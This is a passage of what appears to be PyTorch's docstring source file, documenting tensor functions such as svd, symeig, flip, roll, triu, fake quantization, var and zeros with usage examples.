>>> s
tensor([2.3289, 2.0315, 0.7806])
>>> v
tensor([[-0.0199, 0.8766, 0.4809],
[-0.5080, 0.4054, -0.7600],
[ 0.8611, 0.2594, -0.4373]])
>>> torch.dist(a, torch.mm(torch.mm(u, torch.diag(s)), v.t()))
tensor(8.6531e-07)
>>> a_big = torch.randn(7, 5, 3)
>>> u, s, v = torch.svd(a_big)
>>> torch.dist(a_big, torch.matmul(torch.matmul(u, torch.diag_embed(s)), v.mT))
tensor(2.6503e-06)
.. _the resulting vectors will span the same subspace:
(https://en.wikipedia.org/wiki/Singular_value_decomposition#Singular_values,_singular_vectors,_and_their_relation_to_the_SVD)
""")
add_docstr(torch.symeig, r"""
symeig(input, eigenvectors=False, upper=True, *, out=None) -> (Tensor, Tensor)
This function returns eigenvalues and eigenvectors
of a real symmetric or complex Hermitian matrix :attr:`input` or a batch thereof,
represented by a namedtuple (eigenvalues, eigenvectors).
This function calculates all eigenvalues (and vectors) of :attr:`input`
such that :math:`\text{input} = V \text{diag}(e) V^T`.
The boolean argument :attr:`eigenvectors` defines computation of
both eigenvectors and eigenvalues or eigenvalues only.
If it is ``False``, only eigenvalues are computed. If it is ``True``,
both eigenvalues and eigenvectors are computed.
Since the input matrix :attr:`input` is supposed to be symmetric or Hermitian,
only the upper triangular portion is used by default.
If :attr:`upper` is ``False``, then lower triangular portion is used.
.. warning::
:func:`torch.symeig` is deprecated in favor of :func:`torch.linalg.eigh`
and will be removed in a future PyTorch release. The default behavior has changed
from using the upper triangular portion of the matrix by default to using the
lower triangular portion.
``L, _ = torch.symeig(A, upper=upper)`` should be replaced with
.. code :: python
UPLO = "U" if upper else "L"
L = torch.linalg.eigvalsh(A, UPLO=UPLO)
``L, V = torch.symeig(A, eigenvectors=True, upper=upper)`` should be replaced with
.. code :: python
UPLO = "U" if upper else "L"
L, V = torch.linalg.eigh(A, UPLO=UPLO)
.. note:: The eigenvalues are returned in ascending order. If :attr:`input` is a batch of matrices,
then the eigenvalues of each matrix in the batch is returned in ascending order.
.. note:: Irrespective of the original strides, the returned matrix `V` will
be transposed, i.e. with strides `V.contiguous().mT.stride()`.
.. warning:: Extra care needs to be taken when backward through outputs. Such
operation is only stable when all eigenvalues are distinct and becomes
less stable the smaller :math:`\min_{i \neq j} |\lambda_i - \lambda_j|` is.
Args:
input (Tensor): the input tensor of size :math:`(*, n, n)` where `*` is zero or more
batch dimensions consisting of symmetric or Hermitian matrices.
eigenvectors(bool, optional): controls whether eigenvectors have to be computed
upper(boolean, optional): controls whether to consider upper-triangular or lower-triangular region
Keyword args:
out (tuple, optional): the output tuple of (Tensor, Tensor)
Returns:
(Tensor, Tensor): A namedtuple (eigenvalues, eigenvectors) containing
- **eigenvalues** (*Tensor*): Shape :math:`(*, m)`. The eigenvalues in ascending order.
- **eigenvectors** (*Tensor*): Shape :math:`(*, m, m)`.
If ``eigenvectors=False``, it's an empty tensor.
Otherwise, this tensor contains the orthonormal eigenvectors of the ``input``.
Examples::
>>> a = torch.randn(5, 5)
>>> a = a + a.t() # To make a symmetric
>>> a
tensor([[-5.7827, 4.4559, -0.2344, -1.7123, -1.8330],
[ 4.4559, 1.4250, -2.8636, -3.2100, -0.1798],
[-0.2344, -2.8636, 1.7112, -5.5785, 7.1988],
[-1.7123, -3.2100, -5.5785, -2.6227, 3.1036],
[-1.8330, -0.1798, 7.1988, 3.1036, -5.1453]])
>>> e, v = torch.symeig(a, eigenvectors=True)
>>> e
tensor([-13.7012, -7.7497, -2.3163, 5.2477, 8.1050])
>>> v
tensor([[ 0.1643, 0.9034, -0.0291, 0.3508, 0.1817],
[-0.2417, -0.3071, -0.5081, 0.6534, 0.4026],
[-0.5176, 0.1223, -0.0220, 0.3295, -0.7798],
[-0.4850, 0.2695, -0.5773, -0.5840, 0.1337],
[ 0.6415, -0.0447, -0.6381, -0.0193, -0.4230]])
>>> a_big = torch.randn(5, 2, 2)
>>> a_big = a_big + a_big.mT # To make a_big symmetric
>>> e, v = a_big.symeig(eigenvectors=True)
>>> torch.allclose(torch.matmul(v, torch.matmul(e.diag_embed(), v.mT)), a_big)
True
""")
add_docstr(torch.t,
r"""
t(input) -> Tensor
Expects :attr:`input` to be <= 2-D tensor and transposes dimensions 0
and 1.
0-D and 1-D tensors are returned as is. When input is a 2-D tensor this
is equivalent to ``transpose(input, 0, 1)``.
Args:
{input}
Example::
>>> x = torch.randn(())
>>> x
tensor(0.1995)
>>> torch.t(x)
tensor(0.1995)
>>> x = torch.randn(3)
>>> x
tensor([ 2.4320, -0.4608, 0.7702])
>>> torch.t(x)
tensor([ 2.4320, -0.4608, 0.7702])
>>> x = torch.randn(2, 3)
>>> x
tensor([[ 0.4875, 0.9158, -0.5872],
[ 0.3938, -0.6929, 0.6932]])
>>> torch.t(x)
tensor([[ 0.4875, 0.3938],
[ 0.9158, -0.6929],
[-0.5872, 0.6932]])
See also :func:`torch.transpose`.
""".format(**common_args))
add_docstr(torch.flip,
r"""
flip(input, dims) -> Tensor
Reverse the order of a n-D tensor along given axis in dims.
.. note::
`torch.flip` makes a copy of :attr:`input`'s data. This is different from NumPy's `np.flip`,
which returns a view in constant time. Since copying a tensor's data is more work than viewing that data,
`torch.flip` is expected to be slower than `np.flip`.
Args:
{input}
dims (a list or tuple): axis to flip on
Example::
>>> x = torch.arange(8).view(2, 2, 2)
>>> x
tensor([[[ 0, 1],
[ 2, 3]],
[[ 4, 5],
[ 6, 7]]])
>>> torch.flip(x, [0, 1])
tensor([[[ 6, 7],
[ 4, 5]],
[[ 2, 3],
[ 0, 1]]])
""".format(**common_args))
add_docstr(torch.fliplr,
r"""
fliplr(input) -> Tensor
Flip tensor in the left/right direction, returning a new tensor.
Flip the entries in each row in the left/right direction.
Columns are preserved, but appear in a different order than before.
Note:
Requires the tensor to be at least 2-D.
.. note::
`torch.fliplr` makes a copy of :attr:`input`'s data. This is different from NumPy's `np.fliplr`,
which returns a view in constant time. Since copying a tensor's data is more work than viewing that data,
`torch.fliplr` is expected to be slower than `np.fliplr`.
Args:
input (Tensor): Must be at least 2-dimensional.
Example::
>>> x = torch.arange(4).view(2, 2)
>>> x
tensor([[0, 1],
[2, 3]])
>>> torch.fliplr(x)
tensor([[1, 0],
[3, 2]])
""".format(**common_args))
add_docstr(torch.flipud,
r"""
flipud(input) -> Tensor
Flip tensor in the up/down direction, returning a new tensor.
Flip the entries in each column in the up/down direction.
Rows are preserved, but appear in a different order than before.
Note:
Requires the tensor to be at least 1-D.
.. note::
`torch.flipud` makes a copy of :attr:`input`'s data. This is different from NumPy's `np.flipud`,
which returns a view in constant time. Since copying a tensor's data is more work than viewing that data,
`torch.flipud` is expected to be slower than `np.flipud`.
Args:
input (Tensor): Must be at least 1-dimensional.
Example::
>>> x = torch.arange(4).view(2, 2)
>>> x
tensor([[0, 1],
[2, 3]])
>>> torch.flipud(x)
tensor([[2, 3],
[0, 1]])
""".format(**common_args))
add_docstr(torch.roll,
r"""
roll(input, shifts, dims=None) -> Tensor
Roll the tensor along the given dimension(s). Elements that are shifted beyond the
last position are re-introduced at the first position. If a dimension is not
specified, the tensor will be flattened before rolling and then restored
to the original shape.
Args:
{input}
shifts (int or tuple of ints): The number of places by which the elements
of the tensor are shifted. If shifts is a tuple, dims must be a tuple of
the same size, and each dimension will be rolled by the corresponding
value
dims (int or tuple of ints): Axis along which to roll
Example::
>>> x = torch.tensor([1, 2, 3, 4, 5, 6, 7, 8]).view(4, 2)
>>> x
tensor([[1, 2],
[3, 4],
[5, 6],
[7, 8]])
>>> torch.roll(x, 1, 0)
tensor([[7, 8],
[1, 2],
[3, 4],
[5, 6]])
>>> torch.roll(x, -1, 0)
tensor([[3, 4],
[5, 6],
[7, 8],
[1, 2]])
>>> torch.roll(x, shifts=(2, 1), dims=(0, 1))
tensor([[6, 5],
[8, 7],
[2, 1],
[4, 3]])
""".format(**common_args))
add_docstr(torch.rot90,
r"""
rot90(input, k, dims) -> Tensor
Rotate a n-D tensor by 90 degrees in the plane specified by dims axis.
Rotation direction is from the first towards the second axis if k > 0, and from the second towards the first for k < 0.
Args:
{input}
k (int): number of times to rotate
dims (a list or tuple): axis to rotate
Example::
>>> x = torch.arange(4).view(2, 2)
>>> x
tensor([[0, 1],
[2, 3]])
>>> torch.rot90(x, 1, [0, 1])
tensor([[1, 3],
[0, 2]])
>>> x = torch.arange(8).view(2, 2, 2)
>>> x
tensor([[[0, 1],
[2, 3]],
[[4, 5],
[6, 7]]])
>>> torch.rot90(x, 1, [1, 2])
tensor([[[1, 3],
[0, 2]],
[[5, 7],
[4, 6]]])
""".format(**common_args))
add_docstr(torch.take,
r"""
take(input, index) -> Tensor
Returns a new tensor with the elements of :attr:`input` at the given indices.
The input tensor is treated as if it were viewed as a 1-D tensor. The result
takes the same shape as the indices.
Args:
{input}
index (LongTensor): the indices into tensor
Example::
>>> src = torch.tensor([[4, 3, 5],
... [6, 7, 8]])
>>> torch.take(src, torch.tensor([0, 2, 5]))
tensor([ 4, 5, 8])
""".format(**common_args))
add_docstr(torch.take_along_dim,
r"""
take_along_dim(input, indices, dim, *, out=None) -> Tensor
Selects values from :attr:`input` at the 1-dimensional indices from :attr:`indices` along the given :attr:`dim`.
Functions that return indices along a dimension, like :func:`torch.argmax` and :func:`torch.argsort`,
are designed to work with this function. See the examples below.
.. note::
This function is similar to NumPy's `take_along_axis`.
See also :func:`torch.gather`.
Args:
{input}
indices (tensor): the indices into :attr:`input`. Must have long dtype.
dim (int): dimension to select along.
Keyword args:
{out}
Example::
>>> t = torch.tensor([[10, 30, 20], [60, 40, 50]])
>>> max_idx = torch.argmax(t)
>>> torch.take_along_dim(t, max_idx)
tensor([60])
>>> sorted_idx = torch.argsort(t, dim=1)
>>> torch.take_along_dim(t, sorted_idx, dim=1)
tensor([[10, 20, 30],
[40, 50, 60]])
""".format(**common_args))
add_docstr(torch.tan,
r"""
tan(input, *, out=None) -> Tensor
Returns a new tensor with the tangent of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \tan(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([-1.2027, -1.7687, 0.4412, -1.3856])
>>> torch.tan(a)
tensor([-2.5930, 4.9859, 0.4722, -5.3366])
""".format(**common_args))
add_docstr(torch.tanh,
r"""
tanh(input, *, out=None) -> Tensor
Returns a new tensor with the hyperbolic tangent of the elements
of :attr:`input`.
.. math::
\text{out}_{i} = \tanh(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.8986, -0.7279, 1.1745, 0.2611])
>>> torch.tanh(a)
tensor([ 0.7156, -0.6218, 0.8257, 0.2553])
""".format(**common_args))
add_docstr(torch.topk,
r"""
topk(input, k, dim=None, largest=True, sorted=True, *, out=None) -> (Tensor, LongTensor)
Returns the :attr:`k` largest elements of the given :attr:`input` tensor along
a given dimension.
If :attr:`dim` is not given, the last dimension of the `input` is chosen.
If :attr:`largest` is ``False`` then the `k` smallest elements are returned.
A namedtuple of `(values, indices)` is returned with the `values` and
`indices` of the largest `k` elements of each row of the `input` tensor in the
given dimension `dim`.
The boolean option :attr:`sorted` if ``True``, will make sure that the returned
`k` elements are themselves sorted
Args:
{input}
k (int): the k in "top-k"
dim (int, optional): the dimension to sort along
largest (bool, optional): controls whether to return largest or
smallest elements
sorted (bool, optional): controls whether to return the elements
in sorted order
Keyword args:
out (tuple, optional): the output tuple of (Tensor, LongTensor) that can be
optionally given to be used as output buffers
Example::
>>> x = torch.arange(1., 6.)
>>> x
tensor([ 1., 2., 3., 4., 5.])
>>> torch.topk(x, 3)
torch.return_types.topk(values=tensor([5., 4., 3.]), indices=tensor([4, 3, 2]))
""".format(**common_args))
add_docstr(torch.trace,
r"""
trace(input) -> Tensor
Returns the sum of the elements of the diagonal of the input 2-D matrix.
Example::
>>> x = torch.arange(1., 10.).view(3, 3)
>>> x
tensor([[ 1., 2., 3.],
[ 4., 5., 6.],
[ 7., 8., 9.]])
>>> torch.trace(x)
tensor(15.)
""")
add_docstr(torch.transpose,
r"""
transpose(input, dim0, dim1) -> Tensor
Returns a tensor that is a transposed version of :attr:`input`.
The given dimensions :attr:`dim0` and :attr:`dim1` are swapped.
If :attr:`input` is a strided tensor then the resulting :attr:`out`
tensor shares its underlying storage with the :attr:`input` tensor, so
changing the content of one would change the content of the other.
If :attr:`input` is a :ref:`sparse tensor <sparse-docs>` then the
resulting :attr:`out` tensor *does not* share the underlying storage
with the :attr:`input` tensor.
Args:
{input}
dim0 (int): the first dimension to be transposed
dim1 (int): the second dimension to be transposed
Example::
>>> x = torch.randn(2, 3)
>>> x
tensor([[ 1.0028, -0.9893, 0.5809],
[-0.1669, 0.7299, 0.4942]])
>>> torch.transpose(x, 0, 1)
tensor([[ 1.0028, -0.1669],
[-0.9893, 0.7299],
[ 0.5809, 0.4942]])
See also :func:`torch.t`.
""".format(**common_args))
add_docstr(torch.triangular_solve,
r"""
triangular_solve(b, A, upper=True, transpose=False, unitriangular=False, *, out=None) -> (Tensor, Tensor)
Solves a system of equations with a square upper or lower triangular invertible matrix :math:`A`
and multiple right-hand sides :math:`b`.
In symbols, it solves :math:`AX = b` and assumes :math:`A` is square upper-triangular
(or lower-triangular if :attr:`upper`\ `= False`) and does not have zeros on the diagonal.
`torch.triangular_solve(b, A)` can take in 2D inputs `b, A` or inputs that are
batches of 2D matrices. If the inputs are batches, then returns
batched outputs `X`
If the diagonal of :attr:`A` contains zeros or elements that are very close to zero and
:attr:`unitriangular`\ `= False` (default) or if the input matrix is badly conditioned,
the result may contain `NaN` s.
Supports input of float, double, cfloat and cdouble data types.
.. warning::
:func:`torch.triangular_solve` is deprecated in favor of :func:`torch.linalg.solve_triangular`
and will be removed in a future PyTorch release.
:func:`torch.linalg.solve_triangular` has its arguments reversed and does not return a
copy of one of the inputs.
``X = torch.triangular_solve(B, A).solution`` should be replaced with
.. code:: python
X = torch.linalg.solve_triangular(A, B)
Args:
b (Tensor): multiple right-hand sides of size :math:`(*, m, k)` where
:math:`*` is zero of more batch dimensions
A (Tensor): the input triangular coefficient matrix of size :math:`(*, m, m)`
where :math:`*` is zero or more batch dimensions
upper (bool, optional): whether :math:`A` is upper or lower triangular. Default: ``True``.
transpose (bool, optional): solves `op(A)X = b` where `op(A) = A^T` if this flag is ``True``,
and `op(A) = A` if it is ``False``. Default: ``False``.
unitriangular (bool, optional): whether :math:`A` is unit triangular.
If True, the diagonal elements of :math:`A` are assumed to be
1 and not referenced from :math:`A`. Default: ``False``.
Keyword args:
out ((Tensor, Tensor), optional): tuple of two tensors to write
the output to. Ignored if `None`. Default: `None`.
Returns:
A namedtuple `(solution, cloned_coefficient)` where `cloned_coefficient`
is a clone of :math:`A` and `solution` is the solution :math:`X` to :math:`AX = b`
(or whatever variant of the system of equations, depending on the keyword arguments.)
Examples::
>>> A = torch.randn(2, 2).triu()
>>> A
tensor([[ 1.1527, -1.0753],
[ 0.0000, 0.7986]])
>>> b = torch.randn(2, 3)
>>> b
tensor([[-0.0210, 2.3513, -1.5492],
[ 1.5429, 0.7403, -1.0243]])
>>> torch.triangular_solve(b, A)
torch.return_types.triangular_solve(
solution=tensor([[ 1.7841, 2.9046, -2.5405],
[ 1.9320, 0.9270, -1.2826]]),
cloned_coefficient=tensor([[ 1.1527, -1.0753],
[ 0.0000, 0.7986]]))
""")
add_docstr(torch.tril,
r"""
tril(input, diagonal=0, *, out=None) -> Tensor
Returns the lower triangular part of the matrix (2-D tensor) or batch of matrices
:attr:`input`, the other elements of the result tensor :attr:`out` are set to 0.
The lower triangular part of the matrix is defined as the elements on and
below the diagonal.
The argument :attr:`diagonal` controls which diagonal to consider. If
:attr:`diagonal` = 0, all elements on and below the main diagonal are
retained. A positive value includes just as many diagonals above the main
diagonal, and similarly a negative value excludes just as many diagonals below
the main diagonal. The main diagonal are the set of indices
:math:`\lbrace (i, i) \rbrace` for :math:`i \in [0, \min\{d_{1}, d_{2}\} - 1]` where
:math:`d_{1}, d_{2}` are the dimensions of the matrix.
""" + r"""
Args:
{input}
diagonal (int, optional): the diagonal to consider
Keyword args:
{out}
Example::
>>> a = torch.randn(3, 3)
>>> a
tensor([[-1.0813, -0.8619, 0.7105],
[ 0.0935, 0.1380, 2.2112],
[-0.3409, -0.9828, 0.0289]])
>>> torch.tril(a)
tensor([[-1.0813, 0.0000, 0.0000],
[ 0.0935, 0.1380, 0.0000],
[-0.3409, -0.9828, 0.0289]])
>>> b = torch.randn(4, 6)
>>> b
tensor([[ 1.2219, 0.5653, -0.2521, -0.2345, 1.2544, 0.3461],
[ 0.4785, -0.4477, 0.6049, 0.6368, 0.8775, 0.7145],
[ 1.1502, 3.2716, -1.1243, -0.5413, 0.3615, 0.6864],
[-0.0614, -0.7344, -1.3164, -0.7648, -1.4024, 0.0978]])
>>> torch.tril(b, diagonal=1)
tensor([[ 1.2219, 0.5653, 0.0000, 0.0000, 0.0000, 0.0000],
[ 0.4785, -0.4477, 0.6049, 0.0000, 0.0000, 0.0000],
[ 1.1502, 3.2716, -1.1243, -0.5413, 0.0000, 0.0000],
[-0.0614, -0.7344, -1.3164, -0.7648, -1.4024, 0.0000]])
>>> torch.tril(b, diagonal=-1)
tensor([[ 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000],
[ 0.4785, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000],
[ 1.1502, 3.2716, 0.0000, 0.0000, 0.0000, 0.0000],
[-0.0614, -0.7344, -1.3164, 0.0000, 0.0000, 0.0000]])
""".format(**common_args))
# docstr is split in two parts to avoid format mis-captureing :math: braces '{}'
# as common args.
add_docstr(torch.tril_indices,
r"""
tril_indices(row, col, offset=0, *, dtype=torch.long, device='cpu', layout=torch.strided) -> Tensor
Returns the indices of the lower triangular part of a :attr:`row`-by-
:attr:`col` matrix in a 2-by-N Tensor, where the first row contains row
coordinates of all indices and the second row contains column coordinates.
Indices are ordered based on rows and then columns.
The lower triangular part of the matrix is defined as the elements on and
below the diagonal.
The argument :attr:`offset` controls which diagonal to consider. If
:attr:`offset` = 0, all elements on and below the main diagonal are
retained. A positive value includes just as many diagonals above the main
diagonal, and similarly a negative value excludes just as many diagonals below
the main diagonal. The main diagonal are the set of indices
:math:`\lbrace (i, i) \rbrace` for :math:`i \in [0, \min\{d_{1}, d_{2}\} - 1]`
where :math:`d_{1}, d_{2}` are the dimensions of the matrix.
.. note::
When running on CUDA, ``row * col`` must be less than :math:`2^{59}` to
prevent overflow during calculation.
""" + r"""
Args:
row (``int``): number of rows in the 2-D matrix.
col (``int``): number of columns in the 2-D matrix.
offset (``int``): diagonal offset from the main diagonal.
Default: if not provided, 0.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, ``torch.long``.
{device}
layout (:class:`torch.layout`, optional): currently only support ``torch.strided``.
Example::
>>> a = torch.tril_indices(3, 3)
>>> a
tensor([[0, 1, 1, 2, 2, 2],
[0, 0, 1, 0, 1, 2]])
>>> a = torch.tril_indices(4, 3, -1)
>>> a
tensor([[1, 2, 2, 3, 3, 3],
[0, 0, 1, 0, 1, 2]])
>>> a = torch.tril_indices(4, 3, 1)
>>> a
tensor([[0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3],
[0, 1, 0, 1, 2, 0, 1, 2, 0, 1, 2]])
""".format(**factory_common_args))
add_docstr(torch.triu,
r"""
triu(input, diagonal=0, *, out=None) -> Tensor
Returns the upper triangular part of a matrix (2-D tensor) or batch of matrices
:attr:`input`, the other elements of the result tensor :attr:`out` are set to 0.
The upper triangular part of the matrix is defined as the elements on and
above the diagonal.
The argument :attr:`diagonal` controls which diagonal to consider. If
:attr:`diagonal` = 0, all elements on and above the main diagonal are
retained. A positive value excludes just as many diagonals above the main
diagonal, and similarly a negative value includes just as many diagonals below
the main diagonal. The main diagonal are the set of indices
:math:`\lbrace (i, i) \rbrace` for :math:`i \in [0, \min\{d_{1}, d_{2}\} - 1]` where
:math:`d_{1}, d_{2}` are the dimensions of the matrix.
""" + r"""
Args:
{input}
diagonal (int, optional): the diagonal to consider
Keyword args:
{out}
Example::
>>> a = torch.randn(3, 3)
>>> a
tensor([[ 0.2309, 0.5207, 2.0049],
[ 0.2072, -1.0680, 0.6602],
[ 0.3480, -0.5211, -0.4573]])
>>> torch.triu(a)
tensor([[ 0.2309, 0.5207, 2.0049],
[ 0.0000, -1.0680, 0.6602],
[ 0.0000, 0.0000, -0.4573]])
>>> torch.triu(a, diagonal=1)
tensor([[ 0.0000, 0.5207, 2.0049],
[ 0.0000, 0.0000, 0.6602],
[ 0.0000, 0.0000, 0.0000]])
>>> torch.triu(a, diagonal=-1)
tensor([[ 0.2309, 0.5207, 2.0049],
[ 0.2072, -1.0680, 0.6602],
[ 0.0000, -0.5211, -0.4573]])
>>> b = torch.randn(4, 6)
>>> b
tensor([[ 0.5876, -0.0794, -1.8373, 0.6654, 0.2604, 1.5235],
[-0.2447, 0.9556, -1.2919, 1.3378, -0.1768, -1.0857],
[ 0.4333, 0.3146, 0.6576, -1.0432, 0.9348, -0.4410],
[-0.9888, 1.0679, -1.3337, -1.6556, 0.4798, 0.2830]])
>>> torch.triu(b, diagonal=1)
tensor([[ 0.0000, -0.0794, -1.8373, 0.6654, 0.2604, 1.5235],
[ 0.0000, 0.0000, -1.2919, 1.3378, -0.1768, -1.0857],
[ 0.0000, 0.0000, 0.0000, -1.0432, 0.9348, -0.4410],
[ 0.0000, 0.0000, 0.0000, 0.0000, 0.4798, 0.2830]])
>>> torch.triu(b, diagonal=-1)
tensor([[ 0.5876, -0.0794, -1.8373, 0.6654, 0.2604, 1.5235],
[-0.2447, 0.9556, -1.2919, 1.3378, -0.1768, -1.0857],
[ 0.0000, 0.3146, 0.6576, -1.0432, 0.9348, -0.4410],
[ 0.0000, 0.0000, -1.3337, -1.6556, 0.4798, 0.2830]])
""".format(**common_args))
# docstr is split in two parts to avoid format mis-capturing :math: braces '{}'
# as common args.
add_docstr(torch.triu_indices,
r"""
triu_indices(row, col, offset=0, *, dtype=torch.long, device='cpu', layout=torch.strided) -> Tensor
Returns the indices of the upper triangular part of a :attr:`row` by
:attr:`col` matrix in a 2-by-N Tensor, where the first row contains row
coordinates of all indices and the second row contains column coordinates.
Indices are ordered based on rows and then columns.
The upper triangular part of the matrix is defined as the elements on and
above the diagonal.
The argument :attr:`offset` controls which diagonal to consider. If
:attr:`offset` = 0, all elements on and above the main diagonal are
retained. A positive value excludes just as many diagonals above the main
diagonal, and similarly a negative value includes just as many diagonals below
the main diagonal. The main diagonal are the set of indices
:math:`\lbrace (i, i) \rbrace` for :math:`i \in [0, \min\{d_{1}, d_{2}\} - 1]`
where :math:`d_{1}, d_{2}` are the dimensions of the matrix.
.. note::
When running on CUDA, ``row * col`` must be less than :math:`2^{59}` to
prevent overflow during calculation.
""" + r"""
Args:
row (``int``): number of rows in the 2-D matrix.
col (``int``): number of columns in the 2-D matrix.
offset (``int``): diagonal offset from the main diagonal.
Default: if not provided, 0.
Keyword args:
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, ``torch.long``.
{device}
layout (:class:`torch.layout`, optional): currently only support ``torch.strided``.
Example::
>>> a = torch.triu_indices(3, 3)
>>> a
tensor([[0, 0, 0, 1, 1, 2],
[0, 1, 2, 1, 2, 2]])
>>> a = torch.triu_indices(4, 3, -1)
>>> a
tensor([[0, 0, 0, 1, 1, 1, 2, 2, 3],
[0, 1, 2, 0, 1, 2, 1, 2, 2]])
>>> a = torch.triu_indices(4, 3, 1)
>>> a
tensor([[0, 0, 1],
[1, 2, 2]])
""".format(**factory_common_args))
add_docstr(torch.true_divide, r"""
true_divide(dividend, divisor, *, out) -> Tensor
Alias for :func:`torch.div` with ``rounding_mode=None``.
""")
add_docstr(torch.trunc,
r"""
trunc(input, *, out=None) -> Tensor
Returns a new tensor with the truncated integer values of
the elements of :attr:`input`.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 3.4742, 0.5466, -0.8008, -0.9079])
>>> torch.trunc(a)
tensor([ 3., 0., -0., -0.])
""".format(**common_args))
add_docstr(torch.fake_quantize_per_tensor_affine,
r"""
fake_quantize_per_tensor_affine(input, scale, zero_point, quant_min, quant_max) -> Tensor
Returns a new tensor with the data in :attr:`input` fake quantized using :attr:`scale`,
:attr:`zero_point`, :attr:`quant_min` and :attr:`quant_max`.
.. math::
\text{output} = min(
\text{quant\_max},
max(
\text{quant\_min},
\text{std::nearby\_int}(\text{input} / \text{scale}) + \text{zero\_point}
)
)
Args:
input (Tensor): the input value(s), in ``torch.float32``.
scale (double or Tensor): quantization scale
zero_point (int64 or Tensor): quantization zero_point
quant_min (int64): lower bound of the quantized domain
quant_max (int64): upper bound of the quantized domain
Returns:
Tensor: A newly fake_quantized tensor
Example::
>>> x = torch.randn(4)
>>> x
tensor([ 0.0552, 0.9730, 0.3973, -1.0780])
>>> torch.fake_quantize_per_tensor_affine(x, 0.1, 0, 0, 255)
tensor([0.1000, 1.0000, 0.4000, 0.0000])
>>> torch.fake_quantize_per_tensor_affine(x, torch.tensor(0.1), torch.tensor(0), 0, 255)
tensor([0.6000, 0.4000, 0.0000, 0.0000])
""")
add_docstr(torch.fake_quantize_per_channel_affine,
r"""
fake_quantize_per_channel_affine(input, scale, zero_point, quant_min, quant_max) -> Tensor
Returns a new tensor with the data in :attr:`input` fake quantized per channel using :attr:`scale`,
:attr:`zero_point`, :attr:`quant_min` and :attr:`quant_max`, across the channel specified by :attr:`axis`.
.. math::
\text{output} = min(
\text{quant\_max},
max(
\text{quant\_min},
\text{std::nearby\_int}(\text{input} / \text{scale}) + \text{zero\_point}
)
)
Args:
input (Tensor): the input value(s), in ``torch.float32``.
scale (Tensor): quantization scale, per channel
zero_point (Tensor): quantization zero_point, per channel
axis (int32): channel axis
quant_min (int64): lower bound of the quantized domain
quant_max (int64): upper bound of the quantized domain
Returns:
Tensor: A newly fake_quantized per channel tensor
Example::
>>> x = torch.randn(2, 2, 2)
>>> x
tensor([[[-0.2525, -0.0466],
[ 0.3491, -0.2168]],
[[-0.5906, 1.6258],
[ 0.6444, -0.0542]]])
>>> scales = (torch.randn(2) + 1) * 0.05
>>> scales
tensor([0.0475, 0.0486])
>>> zero_points = torch.zeros(2).to(torch.long)
>>> zero_points
tensor([0, 0])
>>> torch.fake_quantize_per_channel_affine(x, scales, zero_points, 1, 0, 255)
tensor([[[0.0000, 0.0000],
[0.3405, 0.0000]],
[[0.0000, 1.6134],
[0.6323, 0.0000]]])
""")
add_docstr(torch.fix,
r"""
fix(input, *, out=None) -> Tensor
Alias for :func:`torch.trunc`
""")
add_docstr(torch.unsqueeze,
r"""
unsqueeze(input, dim) -> Tensor
Returns a new tensor with a dimension of size one inserted at the
specified position.
The returned tensor shares the same underlying data with this tensor.
A :attr:`dim` value within the range ``[-input.dim() - 1, input.dim() + 1)``
can be used. Negative :attr:`dim` will correspond to :meth:`unsqueeze`
applied at :attr:`dim` = ``dim + input.dim() + 1``.
Args:
{input}
dim (int): the index at which to insert the singleton dimension
Example::
>>> x = torch.tensor([1, 2, 3, 4])
>>> torch.unsqueeze(x, 0)
tensor([[ 1, 2, 3, 4]])
>>> torch.unsqueeze(x, 1)
tensor([[ 1],
[ 2],
[ 3],
[ 4]])
""".format(**common_args))
add_docstr(torch.var, r"""
var(input, dim, unbiased, keepdim=False, *, out=None) -> Tensor
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample variance is calculated, without any correction.
Args:
{input}
{dim}
Keyword args:
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
{keepdim}
{out}
.. function:: var(input, unbiased) -> Tensor
:noindex:
Calculates the variance of all elements in the :attr:`input` tensor.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample deviation is calculated, without any correction.
Args:
{input}
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
Example::
>>> a = torch.tensor([[-0.8166, -1.3802, -0.3560]])
>>> torch.var(a, unbiased=False)
tensor(0.1754)
""".format(**multi_dim_common))
add_docstr(torch.var_mean,
r"""
var_mean(input, dim, unbiased, keepdim=False, *, out=None) -> (Tensor, Tensor)
If :attr:`unbiased` is ``True``, Bessel's correction will be used to calculate
the variance. Otherwise, the sample variance is calculated, without any
correction.
Args:
{input}
{dim}
Keyword args:
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
{keepdim}
{out}
Returns:
A tuple (var, mean) containing the variance and mean.
.. function:: var_mean(input, unbiased) -> (Tensor, Tensor)
:noindex:
Calculates the variance and mean of all elements in the :attr:`input`
tensor.
If :attr:`unbiased` is ``True``, Bessel's correction will be used.
Otherwise, the sample deviation is calculated, without any correction.
Args:
{input}
unbiased (bool): whether to use Bessel's correction (:math:`\delta N = 1`).
Returns:
A tuple (var, mean) containing the variance and mean.
Example::
>>> a = torch.tensor([[-0.8166, -1.3802, -0.3560]])
>>> torch.var_mean(a, unbiased=False)
(tensor(0.1754), tensor(-0.8509))
""".format(**multi_dim_common))
add_docstr(torch.zeros,
r"""
zeros(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with the scalar value `0`, with the shape defined
by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.zeros(2, 3)
tensor([[ 0., 0., 0.],
[ 0., 0., 0.]])
>>> torch.zeros(5)
tensor([ 0., 0., 0., 0., 0.])
